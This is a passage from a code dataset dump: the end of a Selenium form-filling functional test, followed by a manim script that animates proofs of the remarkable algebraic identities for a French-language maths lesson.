a_ethn]\n\t]\n\tfor n, t in atr:\n\t\tni = n.format(i)\n\t\tnni = '[name=\"{}\"]'.format(ni)\n\t\td.execute_script(\"$('{}').select2('destroy')\".format(nni))\n\t\td.execute_script(\"options['%s'] = [%s];\" % (ni, ','.join(\n\t\t\t[\"{'id':'%s','text':'%s', 'selected': true}\" % (o, o) for o in t])))\n\t\td.execute_script(\"$('{}').each(set_select2);\".format(nni))\n\t# groups\n\tj = 1\n\tfor g_ids, g_atd, g_gen_assoc, g_sexism, g_quotes, g_terms in grps:\n\t\tni = 'statement_{}_group_{}_id[]'.format(i, j)\n\t\tnni = '[name=\"{}\"]'.format(ni)\n\t\td.execute_script(\"$('{}').select2('destroy')\".format(nni))\n\t\td.execute_script(\"options['%s'] = [%s];\" % (ni, ','.join(\n\t\t\t[\"{'id':'%s','text':'%s', 'selected': true}\" % (gi, gi) for gi in g_ids])))\n\t\td.execute_script(\"$('{}').each(set_select2);\".format(nni))\n\n\t\ts('statement_{}_group_{}_attitude_type'.format(i, j), g_atd, None, 'radio')\n\t\ts('statement_{}_group_{}_gender_association'.format(i, j), g_gen_assoc, None, 'radio')\n\t\ts('statement_{}_group_{}_sexism'.format(i, j), g_sexism, None, 'radio')\n\t\ts('statement_{}_group_{}_quotes'.format(i, j), g_quotes)\n\t\ts('statement_{}_group_{}_terms'.format(i, j), g_terms)\n\t\t# add new group\n\t\td.find_element_by_name('statement_{}_group'.format(i)).click()\n\t\tj += 1\n\n\td.find_element_by_name('statement').click()\n\ti += 1\n\ns('report_text', 'a comment', 1)\n# check report\na('entry_name', 'entry_name')\n# a('entry_dur', '46')\na('report_gender_text', 'gender comment')\na('report_main_text', 'idea 1', 'in')\na('report_main_text', 'idea 2', 'in')\na('report_main_text', 'idea 3', 'in')\na('report_main_text', 'idea 4', 'in')\n# a()\na('report_text', 'a comment')\n# d.close() \n","sub_path":"tests/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"173596211","text":"from manimlib.imports import *\r\n\r\n\r\n# 0. Thumbnail\r\n# 1. Menu\r\n# 2. Motivation (Distributivite)\r\n# 3. IdentitesRemarquables\r\n# 4. IdRem1 (preuve algebrique: (a+b)^2)\r\n# 5. MeasuredIdentity (preuve geometrique: (a+b)^2 = a^2 + b^2 + 2ab)\r\n# 6. IdRem2 (preuve algebrique: (a-b)^2)\r\n# 7. IdRem3 (preuve algebrique: (a-b)(a+b))\r\n# 8. Exercises1 (1 de chaque) (TO-DO)\r\n# 9. Exercises2 supp. (TO-DO)\r\n\r\n\r\ncolor_map = {\r\n r\"{a}\": BLUE,\r\n r\"{b}\": YELLOW,\r\n}\r\n\r\nclass Thumbnail(Scene):\r\n CONFIG = {\r\n \"square_scale\": 1,\r\n \"squares_colors\": [WHITE, YELLOW]\r\n }\r\n def construct(self):\r\n path = r\"C:/Users/Utilisateur/Desktop/CEGEP/MANIM/manim-recent/media/images/\"\r\n image_peinture = ImageMobject(path + \"kondo_id_rem\")\r\n image_peinture.scale(4)\r\n #image_peinture.to_edge(DOWN)\r\n\r\n line_expand = TextMobject(\"$a^{2}+b^{2}$\").set_color(BLACK).scale(1.5)\r\n line_expand.next_to(4.9*LEFT + 3.65*UP)\r\n\r\n line_factor = TextMobject(r\"$a^{2}-b^{2}$\").set_color(BLACK).scale(1.65)\r\n line_factor.next_to(2.1*RIGHT + 3.65*UP)\r\n\r\n self.play(FadeIn(image_peinture))\r\n self.play(Write(line_expand), Write(line_factor))\r\n self.wait(5)\r\n\r\n\r\nclass Menu(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Menu}\", color=PURPLE).to_corner(UL).scale(1.5)\r\n\r\n l = NumberedList(\r\n *\"\"\"1) Motivation, 2) Identités remarquabless\"\"\".split(\",\"), dot_color=BLUE\r\n )\r\n\r\n #l = NumberedList(*[\"Révision des axiomes\", \"Riemann Hypothesis\", \"P vs NP Problem\"], dot_color=BLUE)\r\n l.scale(1)\r\n l.shift(0.5 * DOWN + 3*LEFT)\r\n self.play(FadeInFromDown(title))\r\n self.play(Write(l))\r\n self.wait()\r\n\r\n #self.play(l.fade_all_but, 3)\r\n self.wait(15)\r\n\r\n\r\n\r\nclass Motivation(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Motivation}\", color=PURPLE).to_corner(UL).scale(1.25)\r\n\r\n l = NumberedList(\r\n *\"\"\"1) Accélérer des calculs, 2) Factoriser, 3) Développer des expressionssss\"\"\".split(\",\"), dot_color=BLUE\r\n )\r\n\r\n #l = NumberedList(*[\"Révision des axiomes\", \"Riemann Hypothesis\", \"P vs NP Problem\"], dot_color=BLUE)\r\n l.scale(1)\r\n l.shift(0.5 * DOWN + 3*LEFT)\r\n self.play(FadeInFromDown(title))\r\n self.play(Write(l))\r\n self.wait()\r\n\r\n #self.play(l.fade_all_but, 3)\r\n self.wait(15)\r\n\r\n\r\nclass IdentitesRemarquables(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Les Identités Remarquables}\").to_corner(UL).scale(1)\r\n context = TextMobject(r\"Soit $a,b\\in\\mathbb{R}$, alors on a }\")\r\n context.next_to([-6.75, 2, 0])\r\n\r\n eq_1 = TextMobject(r\"1) \", r\"$(a+b)^{2}=a^{2}+2ab+b^{2}$\").scale(1)\r\n eq_2 = TextMobject(r\"2) \", r\"$(a-b)^{2}=a^{2}-2ab+b^{2}$\").scale(1)\r\n eq_3 = TextMobject(r\"3) \", r\"$(a-b)(a+b)=a^{2}-b^{2}$\").scale(1)\r\n\r\n nom_1 = TextMobject(r\"\", r\"IR1\").scale(1).set_color(RED)\r\n nom_2 = TextMobject(r\"\", r\"IR2\").scale(1).set_color(BLUE)\r\n nom_3 = TextMobject(r\"\", r\"IR3\").scale(1).set_color(YELLOW)\r\n\r\n eq_1[1].set_color(RED)\r\n eq_2[1].set_color(BLUE)\r\n eq_3[1].set_color(YELLOW)\r\n\r\n eq_1.next_to([-6, 0.75, 0], RIGHT)\r\n nom_1.next_to(eq_1, RIGHT, buff=LARGE_BUFF)\r\n eq_2.next_to(eq_1, DOWN, buff=LARGE_BUFF)\r\n nom_2.next_to(eq_2, RIGHT, buff=LARGE_BUFF).align_to(nom_1, LEFT)\r\n eq_3.next_to(eq_2, DOWN, buff=LARGE_BUFF)\r\n nom_3.next_to(eq_3, RIGHT, buff=LARGE_BUFF).align_to(nom_2, LEFT)\r\n\r\n self.play(FadeInFromDown(title))\r\n self.play(Write(context))\r\n self.wait(5)\r\n self.play(Write(eq_1), Write(nom_1))\r\n self.wait(3)\r\n self.play(Write(eq_2), Write(nom_2))\r\n self.wait(3)\r\n self.play(Write(eq_3), Write(nom_3))\r\n self.wait(25)\r\n\r\n\r\nclass IdRem1(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Preuve de IR1}\", color=RED).to_corner(UL).scale(1)\r\n\r\n eq_1 = TextMobject(r\"$(a+b)^{2}$\", r\" $=$\", r\" $(a+b)(a+b)$\").scale(1.1)\r\n justification_1 = TextMobject(r\"(Par définition)\").scale(0.9)\r\n eq_1.next_to([-6, 1.5, 0], RIGHT)\r\n justification_1.next_to([2.75, 1.35, 0])\r\n\r\n eq_2 = TextMobject(r\" $=$\",r\"$a^{2}+ab+ba+b^{2}$\").scale(1.1)\r\n justification_2 = TextMobject(r\"(Par distributivité)\").scale(0.9)\r\n eq_2[0].next_to(eq_1, DOWN, buff=LARGE_BUFF).align_to(eq_1[1], LEFT)\r\n eq_2[1].next_to(eq_2[0], RIGHT, buff=LARGE_BUFF).align_to(eq_1[2], LEFT)\r\n justification_2.next_to(eq_2[1], RIGHT, buff=LARGE_BUFF).align_to(justification_1, RIGHT)\r\n\r\n eq_3 = TextMobject(r\" $=$\", r\"$a^{2}+ab+ab+b^{2}$\").scale(1.1)\r\n justification_3 = TextMobject(r\"(Par commutativité)\").scale(0.9)\r\n eq_3[0].next_to(eq_2, DOWN, buff=LARGE_BUFF).align_to(eq_2[0], LEFT)\r\n eq_3[1].next_to(eq_3[0], RIGHT, buff=LARGE_BUFF).align_to(eq_2[1], LEFT)\r\n justification_3.next_to(eq_3[1], RIGHT, buff=LARGE_BUFF).align_to(justification_2, RIGHT)\r\n\r\n eq_4 = TextMobject(r\" $=$\", r\"$a^{2}+2ab+b^{2}$\").scale(1.1)\r\n eq_4[0].next_to(eq_3, DOWN, buff=LARGE_BUFF).align_to(eq_3[0], LEFT)\r\n eq_4[1].next_to(eq_4[0], RIGHT, buff=LARGE_BUFF).align_to(eq_3[1], LEFT)\r\n\r\n square = Square(side_length=0.25, fill_color=GOLD, fill_opacity=1, color=ORANGE)\r\n square.move_to(5 * RIGHT + 3 * DOWN)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(5)\r\n self.play(Write(eq_1))\r\n self.wait(5)\r\n self.play(Write(justification_1))\r\n self.wait(3)\r\n self.play(Write(eq_2))\r\n self.wait(5)\r\n self.play(Write(justification_2))\r\n self.wait(3)\r\n self.play(Write(eq_3))\r\n self.wait(5)\r\n self.play(Write(justification_3))\r\n self.wait(5)\r\n self.play(Write(eq_4))\r\n self.wait(3)\r\n self.play(Write(square))\r\n self.wait(15)\r\n\r\n\r\n\r\nclass IdRem2(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Preuve de IR2}\", color=BLUE).to_corner(UL).scale(1)\r\n\r\n eq_1 = TextMobject(r\"$(a-b)^{2}$\", r\" $=$\", r\" $(a+c)^{2}$\").scale(1.1)\r\n justification_1 = TextMobject(r\"(Posons $c=-b$)\").scale(0.9)\r\n eq_1.next_to([-6, 1.5, 0], RIGHT)\r\n justification_1.next_to([2.75, 1.35, 0])\r\n\r\n eq_2 = TextMobject(r\" $=$\",r\"$a^{2}+2ac+c^{2}$\").scale(1.1)\r\n justification_2 = TextMobject(r\"(Par IR1)\").scale(0.9).set_color(RED)\r\n eq_2[0].next_to(eq_1, DOWN, buff=LARGE_BUFF).align_to(eq_1[1], LEFT)\r\n eq_2[1].next_to(eq_2[0], RIGHT, buff=LARGE_BUFF).align_to(eq_1[2], LEFT)\r\n justification_2.next_to(eq_2[1], RIGHT, buff=LARGE_BUFF).align_to(justification_1, RIGHT)\r\n\r\n eq_3 = TextMobject(r\" $=$\", r\"$a^{2}+2a(-b)+(-b)^{2}$\").scale(1.1)\r\n justification_3 = TextMobject(r\"(Par définition)\").scale(0.9)\r\n eq_3[0].next_to(eq_2, DOWN, buff=LARGE_BUFF).align_to(eq_2[0], LEFT)\r\n eq_3[1].next_to(eq_3[0], RIGHT, buff=LARGE_BUFF).align_to(eq_2[1], LEFT)\r\n justification_3.next_to(eq_3[1], RIGHT, buff=LARGE_BUFF).align_to(justification_2, RIGHT)\r\n\r\n eq_4 = TextMobject(r\" $=$\", r\"$a^{2}-2ab+b^{2}$\").scale(1.1)\r\n eq_4[0].next_to(eq_3, DOWN, buff=LARGE_BUFF).align_to(eq_3[0], LEFT)\r\n eq_4[1].next_to(eq_4[0], RIGHT, buff=LARGE_BUFF).align_to(eq_3[1], LEFT)\r\n\r\n square = Square(side_length=0.25, fill_color=GOLD, fill_opacity=1, color=ORANGE)\r\n square.move_to(5 * RIGHT + 3 * DOWN)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(5)\r\n self.play(Write(eq_1))\r\n self.wait(5)\r\n self.play(Write(justification_1))\r\n self.wait(3)\r\n self.play(Write(justification_2))\r\n self.wait(5)\r\n self.play(Write(eq_2))\r\n self.wait(3)\r\n self.play(Write(justification_3))\r\n self.wait(5)\r\n self.play(Write(eq_3))\r\n self.wait(5)\r\n self.play(Write(eq_4))\r\n self.wait(3)\r\n self.play(Write(square))\r\n self.wait(15)\r\n\r\n\r\nclass IdRem3(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Preuve de IR3:}\", color=YELLOW).to_corner(UL).scale(1)\r\n\r\n eq_1 = TextMobject(r\"$(a-b)(a+b)$\", r\" $=$\", r\" $a^{2}+ab-ba-b^{2}$\").scale(1.1)\r\n justification_1 = TextMobject(r\"(Distributivité)\").scale(0.8)\r\n eq_1.next_to([-6, 1.5, 0], RIGHT)\r\n justification_1.next_to([2.75, 1.35, 0])\r\n\r\n eq_2 = TextMobject(r\" $=$ \", r\"$a^{2}$\", r\" $+$ \", r\"$(ab$\", r\" $-$ \", r\"$ab)$\", r\" $-$ \", r\"$b^{2}$\").scale(1.1)\r\n justification_2 = TextMobject(r\"(Commutativité)\").scale(0.8)\r\n eq_2.next_to([-2.6,0,0])\r\n justification_2.next_to(eq_2[1], RIGHT, buff=LARGE_BUFF).align_to(justification_1, RIGHT)\r\n\r\n cancel_ab = Cancel(eq_2[0])\r\n\r\n eq_3 = TextMobject(r\" $=$\", r\"$a^{2}-b^{2}$\").scale(1.1)\r\n eq_3[0].next_to(eq_2, DOWN, buff=LARGE_BUFF).align_to(eq_2[0], LEFT)\r\n eq_3[1].next_to(eq_3[0], RIGHT, buff=LARGE_BUFF).align_to(eq_2[1], LEFT)\r\n\r\n square = Square(side_length=0.25, fill_color=GOLD, fill_opacity=1, color=ORANGE)\r\n square.move_to(5 * RIGHT + 3 * DOWN)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(5)\r\n self.play(Write(eq_1))\r\n self.wait(5)\r\n #self.play(Write(justification_1))\r\n self.play(Write(eq_2))\r\n self.wait(5)\r\n self.add(eq_2, cancel_ab)\r\n self.wait(5)\r\n #self.play(Write(justification_2))\r\n self.play(Write(eq_3))\r\n self.wait(5)\r\n self.play(Write(square))\r\n self.wait(15)\r\n\r\n\r\n\r\nclass MeasuredIdentity(Scene):\r\n CONFIG = {\r\n \"color_triangle\": YELLOW,\r\n \"color_rect_c\": RED,\r\n \"color_rect_b\": PURPLE,\r\n \"color_rect_a\": BLUE,\r\n \"color_square_c\": ORANGE,\r\n \"opacity_triangles\": 0.6,\r\n \"opacity_square_a\": 0.6,\r\n \"opacity_square_b\": 0.6,\r\n \"opacity_square_c\": 0.6,\r\n \"line_width\": 1,\r\n \"l_a\": 5 / 5,\r\n \"l_b\": 12 / 5,\r\n \"l_c\": 13 / 5,\r\n }\r\n\r\n def construct(self):\r\n self.wait(3)\r\n self.pre_square()\r\n self.wait(10)\r\n self.pos_square()\r\n self.transition_squares()\r\n\r\n def pre_square(self):\r\n square = Square(side_length=self.l_a + self.l_b, fill_opacity=0.5, color=ORANGE)\r\n drawed_coords = []\r\n for point in [DL, DR, UL, UR]:\r\n drawed_coords.append(square.get_corner(point))\r\n dl, dr, ul, ur = drawed_coords\r\n\r\n coords_sides = []\r\n for point in [dr + LEFT * self.l_b, dl + UP * self.l_a, ul + RIGHT * self.l_a, ur + DOWN * self.l_b]:\r\n coords_sides.append(point)\r\n lin, liz, ls, ld = coords_sides\r\n\r\n vert_measure = MeasureDistance(Line(dl, dr), invertir=True, dashed=True, buff=-0.25).add_tips()\\\r\n .add_tex(\"a+b\", buff=-3.7, color=WHITE)\r\n hor_measure = MeasureDistance(Line(dl, ul), invertir=False, dashed=True, buff=0.5).add_tips()\\\r\n .add_tex(\"a+b\", buff=2, color=WHITE)\r\n measures_1 = VGroup(hor_measure, vert_measure)\r\n\r\n\r\n title = TextMobject(r\"\\sc Preuve (géométrique): \", color=WHITE).to_corner(UL)\r\n self.title = VGroup(title)\r\n self.play(Write(title, run_time=1), ShowCreation(square, run_time=1),\r\n *[GrowFromCenter(object) for object in [*measures_1]], run_time=1\r\n )\r\n\r\n joint_pre_square = VGroup(square)\r\n self.joint_pre_square = square\r\n self.joint_pre_square.add(hor_measure, vert_measure)\r\n self.play(joint_pre_square.to_edge, LEFT, {\"buff\": 1.7})\r\n self.square = square\r\n\r\n\r\n def pos_square(self):\r\n\r\n square = Square(side_length=self.l_a + self.l_b)\r\n drawed_coords = []\r\n for point in [DL, DR, UL, UR]:\r\n drawed_coords.append(square.get_corner(point))\r\n dl, dr, ul, ur = drawed_coords\r\n\r\n\r\n coords_sides = []\r\n for point in [dr + LEFT * self.l_b, dl + UP * self.l_a, ul + RIGHT * self.l_a, ur + DOWN * self.l_b]:\r\n coords_sides.append(point)\r\n lin, liz, ls, ld = coords_sides\r\n center_point = lin + UP * self.l_a\r\n\r\n\r\n rectangles = []\r\n rectangles_coords = [(ld, dr, lin, center_point), (lin, dl, liz, center_point), (liz, ul, ls, center_point),\r\n (ls, ur, ld, center_point)]\r\n rectangles_colors = [GREEN, PURPLE, GREEN, BLUE]\r\n for rectangle_coords, rectangle_color in zip(rectangles_coords, rectangles_colors):\r\n rectangle = Polygon(rectangle_coords[0], rectangle_coords[1], rectangle_coords[2], rectangle_coords[3],\r\n color=WHITE).set_fill(rectangle_color, self.opacity_triangles) \\\r\n .set_stroke(None, self.line_width)\r\n rectangles.append(rectangle)\r\n\r\n\r\n hor_measure_a = MeasureDistance(Line(dl, lin), invertir=True, dashed=True, buff=-0.25).add_tips() \\\r\n .add_tex(\"a\", buff=-3.7, color=WHITE)\r\n hor_measure_b = MeasureDistance(Line(lin, dr), invertir=True, dashed=True, buff=-0.25).add_tips() \\\r\n .add_tex(\"b\", buff=-2.7, color=WHITE)\r\n vert_measure_b = MeasureDistance(Line(dl, liz), invertir=False, dashed=True, buff=0.5).add_tips() \\\r\n .add_tex(\"a\", buff=2, color=WHITE)\r\n vert_measure_a = MeasureDistance(Line(liz, ul), invertir=False, dashed=True, buff=0.5).add_tips() \\\r\n .add_tex(\"b\", buff=1, color=WHITE)\r\n vert_measure_a[-1].rotate(-PI / 2)\r\n vert_measure_b[-1].rotate(-PI / 2)\r\n measures_2 = VGroup(hor_measure_a, hor_measure_b, vert_measure_a, vert_measure_b)\r\n\r\n joint_pos_squares = VGroup(square, *rectangles, measures_2)\r\n joint_pos_squares.to_edge(RIGHT, buff=1.7)\r\n self.joint_pos_squares = joint_pos_squares\r\n\r\n self.measures_2 = measures_2\r\n\r\n self.rectangles = rectangles\r\n self.rect_ba = rectangles[0]\r\n self.square_a2 = rectangles[1]\r\n self.rect_ab = rectangles[2]\r\n self.square_b2 = rectangles[3]\r\n\r\n\r\n\r\n def transition_squares(self):\r\n\r\n self.play(*[GrowFromCenter(object) for object in [*self.measures_2]], run_time=1)\r\n self.play(DrawBorderThenFill(self.square_a2), DrawBorderThenFill(self.square_b2),\r\n DrawBorderThenFill(self.rect_ba), DrawBorderThenFill(self.rect_ab),\r\n run_time=1)\r\n\r\n self.wait(15)\r\n #t_ab2 = TexMobject(\"(a+b)^2\", color=WHITE).move_to(self.square)\r\n t_ab2 = TexMobject(\"(a+b)^2\", color=WHITE).next_to(np.array([-3.5,0,0]))\r\n t_a2 = TexMobject(\"a^2\", color=WHITE).move_to(self.square_a2)\r\n t_b2 = TexMobject(\"b^2\", color=WHITE).move_to(self.square_b2)\r\n t_ab = TexMobject(\"ab\", color=WHITE).move_to(self.rect_ab)\r\n t_ba = TexMobject(\"ba\", color=WHITE).move_to(self.rect_ba)\r\n\r\n\r\n self.play(*[Write(t_) for t_ in [t_ab2, t_a2, t_b2, t_ab, t_ba]])\r\n\r\n theorem = TexMobject(\"(a+b)^2\", \"=\", \"a^2\", \"+\", \"b^2\", \"+\", \"2ab\").to_edge(DOWN)\r\n [theorem[2 * i].set_color(theorem_color) for i, theorem_color in enumerate([ORANGE, PURPLE, BLUE, GREEN])]\r\n self.play(\r\n *[ReplacementTransform(\r\n t_.copy()[:], r_\r\n ) for t_, r_ in zip([t_ab2, t_a2, t_b2, t_ab, t_ba],\r\n [theorem[0], theorem[2], theorem[4], theorem[6], theorem[6]])],\r\n Write(theorem[1]), Write(theorem[3]), Write(theorem[5]), run_time=2.5\r\n )\r\n self.wait(10)\r\n #self.play(\r\n # self.title.shift, UP * 3,\r\n # theorem.shift, DOWN * 3,\r\n # t_ab2.shift, LEFT * 7,\r\n # self.joint_pre_square.shift, LEFT * 7,\r\n # VGroup(t_a2, t_b2, t_ab, t_ba).shift, RIGHT * 7,\r\n # VGroup(*self.rectangles).shift, RIGHT * 7,\r\n # self.measures_2.shift, RIGHT * 7\r\n #)\r\n\r\n\r\n\r\nclass Ab_sqrt_proof(Scene):\r\n CONFIG = {\r\n \"square_scale\": 2,\r\n \"squares_colors\": [WHITE, YELLOW]\r\n }\r\n def construct(self):\r\n\r\n # Define two squares (one yellow and one white, opacity allows to fill color in figure).\r\n left_square, right_square = Square(fill_opacity=0.5, color=ORANGE), Square()\r\n\r\n # Put the two squares next to another.\r\n VGroup(left_square, right_square)\\\r\n .scale(self.square_scale)\\\r\n .arrange_submobjects(RIGHT,buff=2)\r\n\r\n\r\n # RIGHT SQUARE SETTINGS\r\n ## Configure dots to draw triangles inside right square.\r\n dots2 = [right_square.point_from_proportion(i * 1 / 4 + j * 1 / 16) for i, j in zip(range(4), [1, 3, 3, 1])]\r\n dots_corners2 = [right_square.point_from_proportion(i * 1 / 4) for i in range(4)]\r\n middle = np.array([dots2[0][0], dots2[1][1], 0])\r\n\r\n\r\n def get_color(i):\r\n if i == 0 or i == 2:\r\n return GREEN\r\n elif i == 1:\r\n return BLUE\r\n else:\r\n return PURPLE\r\n\r\n\r\n # Generate the rectangles and squares in which to place the triangles.\r\n all_rectangles = VGroup(*[Polygon(dots_corners2[i], dots2[i], middle, dots2[i - 1],\r\n fill_opacity=0.7, color=get_color(i)) for i in range(4)])\r\n rectangles = all_rectangles[0::2] # Rectangles: rectangles of the triangles\r\n squares = all_rectangles[1::2] # Big and small squares\r\n\r\n # Generate the title\r\n Title = TextMobject(r\"\\underline{Preuve (géométrique):}\")\r\n Title.to_edge(UP + LEFT)\r\n\r\n # Latex formula (located at the bottom of screen).\r\n theorem_colors = [ORANGE, BLUE, PURPLE, GREEN]\r\n theorem = TexMobject(\"(a+b)^2\", \"=\", \"a^2\", \"+\", \"b^2\", \"+\", \"2ab\").to_edge(DOWN)\r\n [theorem[2*i].set_color(theorem_color) for i, theorem_color in enumerate(theorem_colors)]\r\n\r\n # Create tex formula expressions to the new locations (in the Figure (for visualization))\r\n parts_theorem = VGroup(\r\n TexMobject(\"(a+b)^2\").move_to(left_square),\r\n TexMobject(\"a^2\").move_to(squares[0]),\r\n TexMobject(\"b^2\").move_to(squares[1]),\r\n TexMobject(\"ab\").move_to(rectangles[0]),\r\n TexMobject(\"ba\").move_to(rectangles[1])\r\n )\r\n\r\n # Display title\r\n self.play(Write(Title))\r\n\r\n # Draw borders of the squares and fill them (if opacity is defined).\r\n self.play(*list(map(DrawBorderThenFill, [left_square, right_square])))\r\n\r\n # Display the left square, the small right squares and the expressions of the theorem (in small squares).\r\n self.play(ShowCreation(squares), ShowCreation(rectangles), Write(parts_theorem))\r\n\r\n # Replace the elements of the bottom formula by the colored one associated to the figure.\r\n self.play(*[ReplacementTransform(t_.copy()[:], r_, run_time=4)\r\n for t_, r_ in zip(parts_theorem, [theorem[0], theorem[2], theorem[4], theorem[6], theorem[6]])],\r\n Write(theorem[1]), Write(theorem[3]), Write(theorem[5])\r\n )\r\n self.wait(3)\r\n\r\n\r\nclass Exercises1(Scene):\r\n CONFIG = {\r\n \"square_scale\": 1,\r\n \"squares_colors\": [WHITE, YELLOW]\r\n }\r\n # TO-DO :\r\n # Time limit. Find the answers.\r\n # Put the solution on both sides.\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Exercices supplémentaires}\").to_corner(UL).set_color(PURPLE).scale(1.15)\r\n exos = TextMobject(r\" Factoriser les expressions suivantes à l'aide des identités remarquables:\",\r\n r\"\"\"\r\n \\begin{enumerate}\r\n \\item $a-2\\sqrt{a}\\sqrt{b}+b$,\r\n \\item $16y^{2}-4x^{2}$.\r\n \\end{enumerate}\r\n \"\"\")\r\n #definition.scale(0.7)\r\n exos[0].move_to(np.array([-0.75, 2, 0]))\r\n exos.scale(0.8)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(10)\r\n self.play(FadeIn(exos))\r\n self.wait(5)\r\n\r\n # Pause to think about it.\r\n circ = Arc(start_angle=PI / 2, angle=-2 * PI, radius=0.35).to_corner(DL)\r\n timers = [TexMobject(str(i)).move_to(circ) for i in range(5, -1, -1)]\r\n pause = TextMobject(\"Faites pause et trouvez les solutions.\").next_to(circ, RIGHT)\r\n self.play(ShowCreation(circ), Write(pause))\r\n self.play(Write(timers[0]), run_time=0.5)\r\n for i in range(5):\r\n self.play(ReplacementTransform(timers[i], timers[i + 1]), run_time=0.5)\r\n self.wait(0.5)\r\n self.play(FadeOut(pause), FadeOut(timers[-1]), FadeOut(circ), run_time=2)\r\n\r\n answer = TextMobject(\"Solutions (respectivement): $(\\sqrt{a}-\\sqrt{b})^{2}$, $(4y-2x)(4y+2x)$\").to_corner(DL)\r\n self.play(Write(answer))\r\n self.wait(10)\r\n self.play(FadeOut(exos))\r\n self.play(FadeOut(title))\r\n\r\n\r\n\r\n\r\nclass MeasureObject1(Scene):\r\n def construct(self):\r\n square=Square()\r\n measure_line=Line(square.get_corner(DL),square.get_corner(UL))\r\n # MeasureDistance: my_objects.py - line 143\r\n measure=MeasureDistance(measure_line).add_tips()\r\n measure_tex=measure.get_tex(\"x\")\r\n self.add(square,measure,measure_tex)\r\n self.wait(2)\r\n\r\n\r\nclass MeasureDistance(VGroup):\r\n CONFIG = {\r\n \"color\": RED_B,\r\n \"buff\": 0.3,\r\n \"lateral\": 0.3,\r\n \"invert\": False,\r\n \"dashed_segment_length\": 0.09,\r\n \"dashed\": True,\r\n \"ang_arrows\": 30 * DEGREES,\r\n \"size_arrows\": 0.2,\r\n \"stroke\": 2.4,\r\n }\r\n\r\n def __init__(self, mob, **kwargs):\r\n VGroup.__init__(self, **kwargs)\r\n if self.dashed == True:\r\n medicion = DashedLine(ORIGIN, mob.get_length() * RIGHT,\r\n dashed_segment_length=self.dashed_segment_length).set_color(self.color)\r\n else:\r\n medicion = Line(ORIGIN, mob.get_length() * RIGHT)\r\n\r\n medicion.set_stroke(None, self.stroke)\r\n\r\n pre_medicion = Line(ORIGIN, self.lateral * RIGHT).rotate(PI / 2).set_stroke(None, self.stroke)\r\n pos_medicion = pre_medicion.copy()\r\n\r\n pre_medicion.move_to(medicion.get_start())\r\n pos_medicion.move_to(medicion.get_end())\r\n\r\n angulo = mob.get_angle()\r\n matriz_rotacion = rotation_matrix(PI / 2, OUT)\r\n vector_unitario = mob.get_unit_vector()\r\n direccion = np.matmul(matriz_rotacion, vector_unitario)\r\n self.direccion = direccion\r\n\r\n self.add(medicion, pre_medicion, pos_medicion)\r\n self.rotate(angulo)\r\n self.move_to(mob)\r\n\r\n if self.invert == True:\r\n self.shift(-direccion * self.buff)\r\n else:\r\n self.shift(direccion * self.buff)\r\n self.set_color(self.color)\r\n self.tip_point_index = -np.argmin(self.get_all_points()[-1, :])\r\n\r\n def add_tips(self):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n vector_unitario = linea_referencia.get_unit_vector()\r\n\r\n punto_final1 = self[0][-1].get_end()\r\n punto_inicial1 = punto_final1 - vector_unitario * self.size_arrows\r\n\r\n punto_inicial2 = self[0][0].get_start()\r\n punto_final2 = punto_inicial2 + vector_unitario * self.size_arrows\r\n\r\n lin1_1 = Line(punto_inicial1, punto_final1).set_color(self[0].get_color()).set_stroke(None, self.stroke)\r\n lin1_2 = lin1_1.copy()\r\n lin2_1 = Line(punto_inicial2, punto_final2).set_color(self[0].get_color()).set_stroke(None, self.stroke)\r\n lin2_2 = lin2_1.copy()\r\n\r\n lin1_1.rotate(self.ang_arrows, about_point=punto_final1, about_edge=punto_final1)\r\n lin1_2.rotate(-self.ang_arrows, about_point=punto_final1, about_edge=punto_final1)\r\n\r\n lin2_1.rotate(self.ang_arrows, about_point=punto_inicial2, about_edge=punto_inicial2)\r\n lin2_2.rotate(-self.ang_arrows, about_point=punto_inicial2, about_edge=punto_inicial2)\r\n\r\n return self.add(lin1_1, lin1_2, lin2_1, lin2_2)\r\n\r\n def add_tex(self, text, scale=1, buff=-1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TexMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def add_text(self, text, scale=1, buff=0.1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TextMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def add_size(self, text, scale=1, buff=0.1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TextMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n texto.rotate(linea_referencia.get_angle())\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def add_letter(self, text, scale=1, buff=0.1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TexMobject(text, **moreargs).scale(scale).move_to(self)\r\n ancho = texto.get_height() / 2\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def get_text(self, text, scale=1, buff=0.1, invert_dir=False, invert_texto=False, remove_rot=False, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TextMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n if invert_texto:\r\n inv = PI\r\n else:\r\n inv 